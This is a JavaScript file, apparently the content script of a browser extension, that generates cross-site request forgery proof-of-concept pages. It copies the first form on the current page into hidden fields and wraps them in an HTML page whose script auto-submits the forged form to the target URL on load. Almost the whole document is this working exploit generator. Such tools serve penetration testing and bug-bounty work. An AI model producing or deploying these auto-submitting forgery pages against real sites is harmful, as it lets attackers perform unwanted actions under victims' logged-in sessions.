(() => {
    const forms = document.forms;
    if (forms.length === 0) {
        alert("No forms detected for CSRF PoC.");
        return;
    }

    let form = forms[0]; 
    let action = form.action || window.location.href;
    let method = form.method || "GET";
    let inputs = "";

    // Collect all form inputs
    for (let element of form.elements) {
        if (element.name) {
            const sanitizedName = element.name.replace(/[<>"'&]/g, '');
            const sanitizedValue = element.value.replace(/[<>"'&]/g, '');
            inputs += `<input type='hidden' name='${sanitizedName}' value='${sanitizedValue}'>\n`;
        }
    }

    // Generate the PoC HTML
    const csrfPoC = `
<!DOCTYPE html>
<!-- CSRF PoC Generated by @d4ruvil (https://github.com/d4ruvil) -->
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC - ${new Date().toLocaleDateString()}</title>
    <style>
        body { font-family: Arial, sans-serif; background: #1e1e2e; color: white; text-align: center; padding: 20px; }
        .container { background: #282a36; padding: 20px; border-radius: 10px; box-shadow: 0px 0px 10px rgba(0,0,0,0.5); }
        button { background: #ff79c6; border: none; padding: 10px 20px; font-size: 18px; cursor: pointer; border-radius: 5px; }
        button:hover { background: #bd93f9; }
        .watermark { font-size: 12px; color: #6272a4; margin-top: 20px; }
        .watermark a { color: #ff79c6; text-decoration: none; }
        .watermark a:hover { text-decoration: underline; }
    </style>
</head>
<body>
    <div class="container">
        <h2>CSRF PoC Exploit</h2>
        <p><strong>Target:</strong> ${action}</p>
        <form id="csrfForm" action="${action}" method="${method}">
            ${inputs}
            <button type="submit">Submit CSRF</button>
        </form>
        <div class="watermark">
            Generated by <a href="https://github.com/d4ruvil" target="_blank">@d4ruvil</a>
        </div>
        <script>
            // Auto-submit the form
            window.onload = function() {
                document.getElementById('csrfForm').submit();
            }
        </script>
    </div>
</body>
</html>`.trim();

    // Send the generated PoC back to the popup
    chrome.runtime.sendMessage({ 
        action: "generatePoC", 
        csrfPoC: csrfPoC 
    });
})();
